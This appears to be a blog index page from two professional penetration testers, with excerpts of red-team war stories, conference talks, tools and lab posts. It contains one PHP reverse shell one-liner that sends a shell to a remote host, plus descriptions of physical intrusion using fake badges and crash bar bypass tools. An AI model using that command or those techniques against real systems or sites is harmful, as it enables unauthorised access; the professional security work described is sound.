Join Tim and Brent as they discuss stories of their early exploits with old-school hacking, phone phreaking, 90’s hacker culture, \as well as what motivated them to pursue careers in Information Security.
When traveling for these types of assessments, we always consider the location of a client’s facilities. Often, we’re fortunate enough that these locations are adjacent to a hotel, café, food court, or a shared facility in general. How does this help, other than the convenience of a nap or food in between efforts? To a malicious actor, one can use this to conduct passive reconnaissance to gather useful information which is anything from the target facility’s dress code, ingress/egress points, security camera placement, style of… … More War Story: “Can I see that?”
Assessment Type: Red Team (Onsite)Target Type: Corporate Healthcare Institute Assessment Background With a loose-fitting patterned tie, white button-up shirt, some gray slacks, and a fake badge draped around my neck (that I had made up and printed at the hotel earlier that morning during breakfast), I was dropped off at the target facility by a fellow consultant. … More War Story: Piggyback BBQ
We have several war stories like this and often share them as case studies during the presentations and training that Brent and I conduct. I am kicking off a series of regular War Stories that will be shared here! By sharing these stories, I hope to provide some legitimate examples of how we have been … More War Story: Keyloggers and Coffee
When teaching how to attack access control systems such as proximity card readers, it’s much easier to have a solution that allows me to demonstrate, as well as provides students the ability to practice these attacks in the classroom.Access control systems vary from location to location, and getting approval from the facility’s owner to attack … More Portable RFID Access Control Lab
Are the employee’s at your target location paying attention?
Only the most daring physical pentesters are comfortable wearing such a bold shirt to really put a company’s incident response and security awareness training to the test. … More Physical Intrusion T-Shirt
Just for fun, I decided to make a few crash bar (J tool) bypass tools to hand out at DEF CON 26. They are made with weldable wire, and some heat shrink for the grip, and to help prevent scratching. Also, for the sake of size, I decided to create a very small hook that … More Crash Bar Bypass Tools for DEF CON 26
While working on a two-week long engagement with a client, we had built enough rapport to joke openly, and be ourselves (which is a scary thought). Through this, I had started teasing him about his departments “security awareness” posters. These things were so cheesy. So, at the end of the two weeks, as we were … More Vintage Security Awareness Posters
Make an Incomplete Nmap Scan .xml File Usable for Rawr and Other Applications That Accept .csv File-types This is a very non-technical how-to for newcomers who have found themselves in a situation where for some reason or another, their Nmap scan wasn’t able to complete. This can be a problem when you were planning on feeding … More Make an Incomplete Nmap .xml File Usable Again
My #Hack5 LAN Turtle is ready for deployment! This has certainly been a helpful tool to use for #SocialEngineering assessments. –Brent
php -r ’$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
Brent here. DerbyCon 5 – 2015 was awesome! I presented my talk “Hacking Web Apps” and really enjoyed the amount of questions that people asked during the Q&A portion at the end. Thanks to Dave Kennedy and TrustedSec for the opportunity to present. If you’re interested in watching my talk, here is the link: https://www.youtube.com/watch?v=J1tHFEc09u0 … More DerbyCon 5.0 – “Hacking Web Apps”
Brent here. If you’re going to be at DEF CON 23, I’m speaking on Thursday at 11am on hacking web apps. Come on by if you’re able and check it out! I’ll be available for questions afterwards. UPDATE: That was a blast! I’m glad that there was such a great turnout as well as so … More DEF CON 23 – Hacking Web Apps
How to override your hotel’s thermostat and disable the motion sensor to it as well: http://viewfromthewing.boardingarea.com/2013/11/10/override-hotels-thermostat-controls-make-cool-hot-youd-like/
CircleCityCon in Indianapolis! DrBearSec knows how to put on a great hacker conference. Thanks for having Tim and I out to speak. Our talk was titled “From Parking Lot to Pwnage – Hack-free Network Pwnage”. We did a bit of a different format with this talk. You’ll notice we’re sitting in chairs. The more informal, conversational … More CircleCityCon – 2015
THANK YOU to B-Sides Nashville for having us come out and speak. This con was fun, the talk went great and the participation and questions from those who listened was refreshing. The title of our talk was “From Parking Lot to Server Room” and was scheduled from 10:30-11:30am on the “Red” track. Check out http://bsidesnash.org/ … More B-Sides Nashville – 2015
PhreakNIC was another cool setting, smaller hacker con. It was nice to be able to have open conversations during my talk. Another great part of this was being on the Hacker 101 panel that evening. I’m glad that section wasn’t recorded. There were some very “interesting” topics and it certainly felt like an old-school hacker meetup … More PhreakNIC 2015 – Nashville, TN
We Hack People - Covert Entry 
You must be logged in to post a comment.